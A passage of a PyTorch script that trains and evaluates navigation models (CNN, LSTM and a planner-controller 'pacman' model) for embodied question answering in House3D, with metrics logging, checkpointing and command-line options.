#cv2.imwrite('{}-{}-{}-{}.png'.format(num, i, episode_length, time_img), img)
if args.render:
# cv2.imshow('window', img)
# cv2.waitKey(100)
video.write(img)
first_step = False
if args.render:
video.release()
# compute stats
metrics_slug['d_0_' + str(i)] = dists_to_target[0]
metrics_slug['d_T_' + str(i)] = dists_to_target[-1]
metrics_slug['d_D_' + str(
i)] = dists_to_target[0] - dists_to_target[-1]
metrics_slug['d_min_' + str(i)] = np.array(
dists_to_target).min()
metrics_slug['ep_len_' + str(i)] = episode_length
if action == 3:
metrics_slug['stop_' + str(i)] = 1
else:
metrics_slug['stop_' + str(i)] = 0
inside_room = []
for p in pos_queue:
inside_room.append(
h3d.is_inside_room(
p, eval_loader.dataset.target_room))
if inside_room[-1] == True:
metrics_slug['r_T_' + str(i)] = 1
else:
metrics_slug['r_T_' + str(i)] = 0
if any([x == True for x in inside_room]) == True:
metrics_slug['r_e_' + str(i)] = 1
else:
metrics_slug['r_e_' + str(i)] = 0
# collate and update metrics
metrics_list = []
for i in metrics.metric_names:
if i not in metrics_slug:
metrics_list.append(metrics.metrics[
metrics.metric_names.index(i)][0])
else:
metrics_list.append(metrics_slug[i])
# update metrics
metrics.update(metrics_list)
try:
print(metrics.get_stat_string(mode=0))
logging.info("EVAL: metrics: {}".format(metrics.get_stat_string(mode=0)))
except:
pass
print('epoch', epoch)
print('invalids', len(invalids))
logging.info("EVAL: epoch {}".format(epoch))
logging.info("EVAL: invalids {}".format(invalids))
# del h3d
eval_loader.dataset._load_envs()
if len(eval_loader.dataset.pruned_env_set) == 0:
done = True
epoch += 1
cov_avg = avgCov(coverage_log)
# checkpoint if best val loss
if metrics.metrics[8][0] > best_eval_acc: # d_D_50
best_eval_acc = metrics.metrics[8][0]
if epoch % args.eval_every == 0 and args.to_log == 1:
metrics.dump_log()
model_state = get_state(model)
aad = dict(args.__dict__)
ad = {}
for i in aad:
if i[0] != '_':
ad[i] = aad[i]
checkpoint = {'args': ad, 'state': model_state, 'epoch': epoch}
checkpoint_path = '%s/epoch_%d_d_D_50_%.04f.pt' % (
args.checkpoint_dir, epoch, best_eval_acc)
print('Saving checkpoint to %s' % checkpoint_path)
logging.info("EVAL: Saving checkpoint to {}".format(checkpoint_path))
torch.save(checkpoint, checkpoint_path)
print('[best_eval_d_D_50:%.04f; best Coverage:%.04f]' % (best_eval_acc, best_cov))
logging.info("EVAL: [best_eval_d_D_50:{0:.2f}]".format(best_eval_acc))
eval_loader.dataset._load_envs(start_idx=0, in_order=True)
return best_eval_acc
def train(rank, args, shared_model, resume_epoch = 0):
torch.cuda.set_device(args.gpus.index(args.gpus[rank % len(args.gpus)]))
if args.model_type == 'cnn':
model_kwargs = {}
model = NavCnnModel(**model_kwargs)
elif args.model_type == 'cnn+q':
model_kwargs = {
'question_input': True,
'question_vocab': load_vocab(args.vocab_json)
}
model = NavCnnModel(**model_kwargs)
elif args.model_type == 'lstm':
model_kwargs = {}
model = NavCnnRnnModel(**model_kwargs)
elif args.model_type == 'lstm-mult+q':
model_kwargs = {
'question_input': True,
'question_vocab': load_vocab(args.vocab_json)
}
model = NavCnnRnnMultModel(**model_kwargs)
elif args.model_type == 'lstm+q':
model_kwargs = {
'question_input': True,
'question_vocab': load_vocab(args.vocab_json)
}
model = NavCnnRnnModel(**model_kwargs)
elif args.model_type == 'pacman':
model_kwargs = {'question_vocab': load_vocab(args.vocab_json)}
model = NavPlannerControllerModel(**model_kwargs)
else:
exit()
lossFn = torch.nn.CrossEntropyLoss().cuda()
optim = torch.optim.Adamax(
filter(lambda p: p.requires_grad, shared_model.parameters()),
lr=args.learning_rate)
train_loader_kwargs = {
'questions_h5': args.train_h5,
'data_json': args.data_json,
'vocab': args.vocab_json,
'batch_size': args.batch_size,
'input_type': args.model_type,
'num_frames': 5,
'map_resolution': args.map_resolution,
'split': 'train',
'max_threads_per_gpu': args.max_threads_per_gpu,
'gpu_id': args.gpus[rank % len(args.gpus)],
'to_cache': args.to_cache,
'overfit': args.overfit,
'max_controller_actions': args.max_controller_actions,
'max_actions': args.max_actions
}
args.output_log_path = os.path.join(args.log_dir,
'train_' + str(rank) + '.json')
if 'pacman' in args.model_type:
metrics = NavMetric(
info={'split': 'train',
'thread': rank},
metric_names=['planner_loss', 'controller_loss'],
log_json=args.output_log_path)
else:
metrics = NavMetric(
info={'split': 'train',
'thread': rank},
metric_names=['loss'],
log_json=args.output_log_path)
train_loader = EqaDataLoader(**train_loader_kwargs)
print('train_loader has %d samples' % len(train_loader.dataset))
logging.info('TRAIN: train loader has {} samples'.format(len(train_loader.dataset)))
t, epoch = 0, resume_epoch
best_eval_acc = 0 if args.best_eval_acc==0 else args.best_eval_acc
while epoch < int(args.max_epochs):
if 'cnn' in args.model_type:
done = False
all_envs_loaded = train_loader.dataset._check_if_all_envs_loaded()
while done == False:
for batch in train_loader:
t += 1
model.load_state_dict(shared_model.state_dict())
model.train()
model.cuda()
idx, questions, _, img_feats, _, actions_out, _ = batch
img_feats_var = Variable(img_feats.cuda())
if '+q' in args.model_type:
questions_var = Variable(questions.cuda())
actions_out_var = Variable(actions_out.cuda())
if '+q' in args.model_type:
scores = model(img_feats_var, questions_var)
else:
scores = model(img_feats_var)
loss = lossFn(scores, actions_out_var)
# zero grad
optim.zero_grad()
# update metrics
metrics.update([loss.data[0]])
# backprop and update
loss.backward()
ensure_shared_grads(model.cpu(), shared_model)
optim.step()
if t % args.print_every == 0:
print(metrics.get_stat_string())
logging.info("TRAIN: metrics: {}".format(metrics.get_stat_string()))
if args.to_log == 1:
metrics.dump_log()
print('[CHECK][Cache:%d][Total:%d]' %
(len(train_loader.dataset.img_data_cache),
len(train_loader.dataset.env_list)))
logging.info('TRAIN: [CHECK][Cache:{}][Total:{}]'.format(
len(train_loader.dataset.img_data_cache), len(train_loader.dataset.env_list)))
if all_envs_loaded == False:
train_loader.dataset._load_envs(in_order=True)
if len(train_loader.dataset.pruned_env_set) == 0:
done = True
if args.to_cache == False:
train_loader.dataset._load_envs(
start_idx=0, in_order=True)
else:
done = True
elif 'lstm' in args.model_type:
lossFn = MaskedNLLCriterion().cuda()
done = False
all_envs_loaded = train_loader.dataset._check_if_all_envs_loaded()
total_times = []
while done == False:
start_time = time.time()
for batch in train_loader:
t += 1
model.load_state_dict(shared_model.state_dict())
model.train()
model.cuda()
idx, questions, _, img_feats, actions_in, actions_out, action_lengths, masks = batch
img_feats_var = Variable(img_feats.cuda())
if '+q' in args.model_type:
questions_var = Variable(questions.cuda())
actions_in_var = Variable(actions_in.cuda())
actions_out_var = Variable(actions_out.cuda())
action_lengths = action_lengths.cuda()
masks_var = Variable(masks.cuda())
action_lengths, perm_idx = action_lengths.sort(
0, descending=True)
img_feats_var = img_feats_var[perm_idx]
if '+q' in args.model_type:
questions_var = questions_var[perm_idx]
actions_in_var = actions_in_var[perm_idx]
actions_out_var = actions_out_var[perm_idx]
masks_var = masks_var[perm_idx]
if '+q' in args.model_type:
scores, hidden = model(img_feats_var, questions_var,
actions_in_var,
action_lengths.cpu().numpy())
else:
scores, hidden = model(img_feats_var, False,
actions_in_var,
action_lengths.cpu().numpy())
#block out masks
if args.curriculum:
curriculum_length = (epoch+1)*5
for i, action_length in enumerate(action_lengths):
if action_length - curriculum_length > 0:
masks_var[i, :action_length-curriculum_length] = 0
logprob = F.log_softmax(scores, dim=1)
loss = lossFn(
logprob, actions_out_var[:, :action_lengths.max()]
.contiguous().view(-1, 1),
masks_var[:, :action_lengths.max()].contiguous().view(
-1, 1))
# zero grad
optim.zero_grad()
# update metrics
metrics.update([loss.data[0]])
logging.info("TRAIN LSTM loss: {:.6f}".format(loss.data[0]))
# backprop and update
loss.backward()
ensure_shared_grads(model.cpu(), shared_model)
optim.step()
if t % args.print_every == 0:
print(metrics.get_stat_string())
logging.info("TRAIN: metrics: {}".format(metrics.get_stat_string()))
if args.to_log == 1:
metrics.dump_log()
print('[CHECK][Cache:%d][Total:%d]' %
(len(train_loader.dataset.img_data_cache),
len(train_loader.dataset.env_list)))
logging.info('TRAIN: [CHECK][Cache:{}][Total:{}]'.format(
len(train_loader.dataset.img_data_cache), len(train_loader.dataset.env_list)))
if all_envs_loaded == False:
train_loader.dataset._load_envs(in_order=True)
if len(train_loader.dataset.pruned_env_set) == 0:
done = True
if args.to_cache == False:
train_loader.dataset._load_envs(
start_idx=0, in_order=True)
else:
done = True
elif 'pacman' in args.model_type:
planner_lossFn = MaskedNLLCriterion().cuda()
controller_lossFn = MaskedNLLCriterion().cuda()
done = False
all_envs_loaded = train_loader.dataset._check_if_all_envs_loaded()
while done == False:
for batch in train_loader:
t += 1
model.load_state_dict(shared_model.state_dict())
model.train()
model.cuda()
idx, questions, _, planner_img_feats, planner_actions_in, \
planner_actions_out, planner_action_lengths, planner_masks, \
controller_img_feats, controller_actions_in, planner_hidden_idx, \
controller_outs, controller_action_lengths, controller_masks = batch
questions_var = Variable(questions.cuda())
planner_img_feats_var = Variable(planner_img_feats.cuda())
planner_actions_in_var = Variable(
planner_actions_in.cuda())
planner_actions_out_var = Variable(
planner_actions_out.cuda())
planner_action_lengths = planner_action_lengths.cuda()
planner_masks_var = Variable(planner_masks.cuda())
controller_img_feats_var = Variable(
controller_img_feats.cuda())
controller_actions_in_var = Variable(
controller_actions_in.cuda())
planner_hidden_idx_var = Variable(
planner_hidden_idx.cuda())
controller_outs_var = Variable(controller_outs.cuda())
controller_action_lengths = controller_action_lengths.cuda(
)
controller_masks_var = Variable(controller_masks.cuda())
planner_action_lengths, perm_idx = planner_action_lengths.sort(
0, descending=True)
questions_var = questions_var[perm_idx]
planner_img_feats_var = planner_img_feats_var[perm_idx]
planner_actions_in_var = planner_actions_in_var[perm_idx]
planner_actions_out_var = planner_actions_out_var[perm_idx]
planner_masks_var = planner_masks_var[perm_idx]
controller_img_feats_var = controller_img_feats_var[
perm_idx]
controller_actions_in_var = controller_actions_in_var[
perm_idx]
controller_outs_var = controller_outs_var[perm_idx]
planner_hidden_idx_var = planner_hidden_idx_var[perm_idx]
controller_action_lengths = controller_action_lengths[
perm_idx]
controller_masks_var = controller_masks_var[perm_idx]
planner_scores, controller_scores, planner_hidden = model(
questions_var, planner_img_feats_var,
planner_actions_in_var,
planner_action_lengths.cpu().numpy(),
planner_hidden_idx_var, controller_img_feats_var,
controller_actions_in_var, controller_action_lengths)
planner_logprob = F.log_softmax(planner_scores, dim=1)
controller_logprob = F.log_softmax(
controller_scores, dim=1)
planner_loss = planner_lossFn(
planner_logprob,
planner_actions_out_var[:, :planner_action_lengths.max(
)].contiguous().view(-1, 1),
planner_masks_var[:, :planner_action_lengths.max()]
.contiguous().view(-1, 1))
controller_loss = controller_lossFn(
controller_logprob,
controller_outs_var[:, :controller_action_lengths.max(
)].contiguous().view(-1, 1),
controller_masks_var[:, :controller_action_lengths.max(
)].contiguous().view(-1, 1))
# zero grad
optim.zero_grad()
# update metrics
metrics.update(
[planner_loss.data[0], controller_loss.data[0]])
logging.info("TRAINING PACMAN planner-loss: {:.6f} controller-loss: {:.6f}".format(
planner_loss.data[0], controller_loss.data[0]))
# backprop and update
if args.max_controller_actions == 1:
(planner_loss).backward()
else:
(planner_loss + controller_loss).backward()
ensure_shared_grads(model.cpu(), shared_model)
optim.step()
if t % args.print_every == 0:
print(metrics.get_stat_string())
logging.info("TRAIN: metrics: {}".format(metrics.get_stat_string()))
if args.to_log == 1:
metrics.dump_log()
print('[CHECK][Cache:%d][Total:%d]' %
(len(train_loader.dataset.img_data_cache),
len(train_loader.dataset.env_list)))
logging.info('TRAIN: [CHECK][Cache:{}][Total:{}]'.format(
len(train_loader.dataset.img_data_cache), len(train_loader.dataset.env_list)))
if all_envs_loaded == False:
train_loader.dataset._load_envs(in_order=True)
if len(train_loader.dataset.pruned_env_set) == 0:
done = True
if args.to_cache == False:
train_loader.dataset._load_envs(
start_idx=0, in_order=True)
else:
done = True
epoch += 1
if epoch % args.eval_every ==0:
best_eval_acc = eval(rank,args,shared_model, best_eval_acc)
if epoch % args.save_every == 0:
model_state = get_state(model)
optimizer_state = optim.state_dict()
aad = dict(args.__dict__)
ad = {}
for i in aad:
if i[0] != '_':
ad[i] = aad[i]
checkpoint = {'args': ad,
'state': model_state,
'epoch': epoch,
'optimizer': optimizer_state}
checkpoint_path = '%s/epoch_%d_thread_%d.pt' % (
args.checkpoint_dir, epoch, rank)
print('Saving checkpoint to %s' % checkpoint_path)
logging.info("TRAIN: Saving checkpoint to {}".format(checkpoint_path))
torch.save(checkpoint, checkpoint_path)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
# data params
parser.add_argument('-train_h5', default='utils/data/pruned_train_v2.h5')
parser.add_argument('-val_h5', default='utils/data/pruned_val_v2.h5')
parser.add_argument('-test_h5', default='utils/data/pruned_test_v2.h5')
parser.add_argument('-data_json', default='utils/data/pruned_data_json_v2.json')
parser.add_argument('-vocab_json', default='data/new_vocab.json')
parser.add_argument(
'-target_obj_conn_map_dir',
default='data/500')
parser.add_argument('-map_resolution', default=500, type=int)
parser.add_argument(
'-mode',
default='train+eval',
type=str,
choices=['train', 'eval', 'train+eval'])
parser.add_argument('-eval_split', default='val', type=str)
# model details
parser.add_argument(
'-model_type',
default='pacman',
choices=['cnn', 'cnn+q', 'lstm', 'lstm+q', 'lstm-mult+q', 'pacman'])
parser.add_argument('-max_episode_length', default=100, type=int)
parser.add_argument('-curriculum', default=0, type=int)
# optim params
parser.add_argument('-batch_size', default=20, type=int)
parser.add_argument('-learning_rate', default=1e-3, type=float)
parser.add_argument('-max_epochs', default=1000, type=int)
parser.add_argument('-overfit', default=False, action='store_true')
parser.add_argument('-render', default=False, action='store_true')
# bookkeeping
parser.add_argument('-print_every', default=5, type=int)
parser.add_argument('-eval_every', default=1, type=int)
parser.add_argument('-save_every', default=5, type=int) #optional if you would like to save specific epochs as opposed to relying on the eval thread
parser.add_argument('-identifier', default='pacman')
parser.add_argument('-num_processes', default=1, type=int)
parser.add_argument('-max_threads_per_gpu', default=10, type=int)
# checkpointing
parser.add_argument('-checkpoint_path', default=False)
parser.add_argument('-checkpoint_dir', default='checkpoints/05_06/nav/')
parser.add_argument('-log_dir', default='logs/05_06/nav/')
parser.add_argument('-to_log', default=1, type=int)
parser.add_argument('-to_cache', action='store_true')
parser.add_argument('-max_controller_actions', type=int, default=5)
parser.add_argument('-max_actions', type=int)
parser.add_argument('-best_eval_acc', type=float, default=0)
args = parser.parse_args()
args.time_id = time.strftime("%m_%d_%H:%M")
#MAX_CONTROLLER_ACTIONS = args.max_controller_actions
if not os.path.isdir(args.log_dir):
os.makedirs(args.log_dir)
if args.curriculum:
assert 'lstm' in args.model_type #TODO: Finish implementing curriculum for other model types
logging.basicConfig(filename=os.path.join(args.log_dir, "run_{}.log".format(
str(datetime.now()).replace(' ', '_'))),
level=logging.INFO,
format='%(asctime)-15s %(message)s')
#try:
# args.gpus = os.environ['CUDA_VISIBLE_DEVICES'].split(',')
# args.gpus = [int(x) for x in args.gpus]
#except KeyError:
# print("CPU not supported")
# logging.info("CPU not supported")
# exit()
args.gpus = [0]
if args.checkpoint_path != False:
print('Loading checkpoint from %s' % args.checkpoint_path)
logging.info("Loading checkpoint from {}".format(args.checkpoint_path))
args_to_keep = ['model_type']
checkpoint = torch.load(args.checkpoint_path, map_location={
'cuda:0': 'cpu'
})
for i in args.__dict__:
if i not in args_to_keep:
checkpoint['args'][i] = args.__dict__[i]
args = type('new_dict', (object, ), checkpoint['args'])
args.checkpoint_dir = os.path.join(args.checkpoint_dir,
args.time_id + '_' + args.identifier)
args.log_dir = os.path.join(args.log_dir,
args.time_id + '_' + args.identifier)
# if set to overfit; set eval_split to train
if args.overfit == True:
args.eval_split = 'train'
print(args.__dict__)
logging.info(args.__dict__)
if not os.path.exists(args.checkpoint_dir):
os.makedirs(args.checkpoint_dir)
os.makedirs(args.log_dir)
if args.model_type == 'cnn':
model_kwargs = {}
shared_model = NavCnnModel(**model_kwargs)
elif args.model_type == 'cnn+q':
model_kwargs = {
'question_input': True,
'question_vocab': load_vocab(args.vocab_json)
}
shared_model = NavCnnModel(**model_kwargs)
elif args.model_type == 'lstm':
model_kwargs = {}
shared_model = NavCnnRnnModel(**model_kwargs)
elif args.model_type == 'lstm+q':
model_kwargs = {
'question_input': True,
'question_vocab': load_vocab(args.vocab_json)
}
shared_model = NavCnnRnnModel(**model_kwargs)
elif args.model_type == 'pacman':
model_kwargs = {'question_vocab': load_vocab(args.vocab_json)}
shared_model = NavPlannerControllerModel(**model_kwargs)
else:
exit()
shared_model.share_memory()
resume_epoch = 0
if args.checkpoint_path != False:
print('Loading params from checkpoint: %s' % args.checkpoint_path)
logging.info("Loading params from checkpoint: {}".format(args.checkpoint_path))
shared_model.load_state_dict(checkpoint['state'])
resume_epoch = checkpoint['epoch']
if args.mode == 'eval':
eval(0, args, shared_model, 20)
elif args.mode == 'train':
if args.num_processes > 1:
processes = []
for rank in range(0, args.num_processes):
# for rank in range(0, args.num_processes):
p = mp.Process(target=train, args=(rank, args, shared_model))
p.start()
processes.append(p)
for p in processes:
p.join()
else:
train(0, args, shared_model, resume_epoch = resume_epoch)
else:
processes = []
# Start the eval thread
#p = mp.Process(target=eval, args=(0, args, shared_model))
#p.start()
#processes.append(p)
# Start the training thread(s)
for rank in range(1, args.num_processes + 1):
# for rank in range(0, args.num_processes):
p = mp.Process(target=train, args=(rank, args, shared_model, resume_epoch))
p.start()
processes.append(p)
for p in processes:
p.join()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.